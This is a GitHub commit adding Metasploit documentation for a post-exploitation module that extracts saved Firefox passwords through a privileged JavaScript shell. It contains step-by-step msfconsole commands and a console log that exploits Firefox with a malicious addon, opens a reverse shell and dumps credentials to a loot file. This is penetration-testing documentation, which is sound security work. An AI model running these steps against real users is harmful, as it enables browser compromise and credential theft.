Skip to content

Commit 7e2e98f

Browse files
author
Brent Cook
committed
Land rapid7#7413, Add KB for post/firefox/gather/passwords
2 parents f6353b1 + 8646571 commit 7e2e98f

File tree

1 file changed

+68
-0
lines changed

1 file changed

+68
-0
lines changed

documentation/modules/post/firefox/gather/passwords.md

Lines changed: 68 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,68 @@
1+
## Vulnerable Application
2+
3+
This post-exploitation module allows the collection of saved Firefox passwords from a Firefox privileged javascript shell.
4+
5+
## Verification Steps
6+
7+
1. Start `msfconsole`
8+
2. Get privileged javascript session
9+
3. Do: `use post/firefox/gather/passwords`
10+
4. Do: `set SESSION <session id>`
11+
5. Do: `run`
12+
6. You should be able to see all saved Firefox passwords in the loot file in JSON format
13+
14+
## Options
15+
16+
- **SESSION** - The session to run the module on.
17+
18+
- **TIMEOUT** - Maximum time (seconds) to wait for a response. The default value is 90.
19+
20+
## Scenarios
21+
22+
**Obtain a privileged javascript shell and gather saved Firefox passwords**
23+
24+
To be able to use this module, a privileged javascript shell is needed. It can be obtained by using a javascript privilege exploit like `exploit/multi/browser/firefox_proto_crmfrequest`, `exploit/multi/browser/firefox_proxy_prototype` or others.
25+
In the example case of the `firefox_proto_crmfrequest` exploit use `set TARGET 0` to use a javascript shell.
26+
27+
```
28+
msf > use exploit/multi/browser/firefox_proto_crmfrequest
29+
msf exploit(firefox_proto_crmfrequest) > set TARGET 0
30+
TARGET => 0
31+
msf exploit(firefox_proto_crmfrequest) > run
32+
[*] Exploit running as background job.
33+
msf exploit(firefox_proto_crmfrequest) >
34+
[*] Started reverse TCP handler on 192.168.2.117:4444
35+
[*] Using URL: http://0.0.0.0:8080/nbHsSeXAfjr
36+
[*] Local IP: http://192.168.2.117:8080/nbHsSeXAfjr
37+
[*] Server started.
38+
[*] Gathering target information for 192.168.2.117
39+
[*] Sending HTML response to 192.168.2.117
40+
[*] Sending HTML
41+
[*] Sending the malicious addon
42+
[*] Command shell session 1 opened (192.168.2.117:4444 -> 192.168.2.117:35100) at 2016-10-08 00:33:09 +0200
43+
44+
msf exploit(firefox_proto_crmfrequest) > use post/firefox/gather/passwords
45+
msf post(passwords) > set SESSION 1
46+
SESSION => 1
47+
msf post(passwords) > run
48+
49+
[*] Running the privileged javascript...
50+
[+] Saved 1 passwords to /home/user/.msf4/loot/20161008003433_default_192.168.2.117_firefox.password_070261.txt
51+
[*] Post module execution completed
52+
```
53+
54+
The loot file then contains all passwords in json format, like so:
55+
56+
```
57+
[
58+
{
59+
"password":"1234",
60+
"passwordField":"pwd",
61+
"username":"admin",
62+
"usernameField":"log",
63+
"httpRealm":"",
64+
"formSubmitURL":"https://example.com",
65+
"hostname":"https://example.com"
66+
}
67+
]
68+
```

0 commit comments

Comments
 (0)